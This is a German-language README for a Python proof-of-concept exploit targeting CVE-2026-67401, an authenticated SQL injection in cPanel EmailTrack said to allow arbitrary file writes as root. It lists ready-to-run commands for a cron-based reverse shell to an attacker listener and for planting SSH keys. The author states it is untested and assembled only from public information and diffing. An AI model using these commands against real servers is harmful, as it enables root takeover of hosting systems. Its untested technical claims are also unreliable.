
Python-Proof-of-Concept für CVE-2026-67401, eine authentifizierte SQL-Injection in cPanel EmailTrack, die das Schreiben beliebiger Dateien als Root über SQLite ATTACH DATABASE ermöglicht und so eine Reverse Shell oder das Hinterlegen von SSH-Keys erlaubt.
SQL-Injection in cPanel EmailTrack. Ein authentifizierter cPanel-Benutzer mit Mail-Berechtigungen schreibt beliebige Dateien als Root über SQLite ATTACH DATABASE. Eine Anfrage bis zum Root. Nicht auf einem echten Zielsystem getestet, der Code wurde nur aus öffentlichen Informationen und grundlegendem Diffing zusammengestellt. Recherchiert als Forscher gründlich, probiert es aus und sendet PR-Fixes.
Betrifft alle cPanel/WHM-Builds vor dem Patch vom 8. September 2026.
requests-Bibliothek# Reverse-Shell über Cron
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# SSH-Key-Hinterlegung
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# Bestehende Sitzung
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# Trockenlauf (Anfrage anzeigen, nicht senden)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1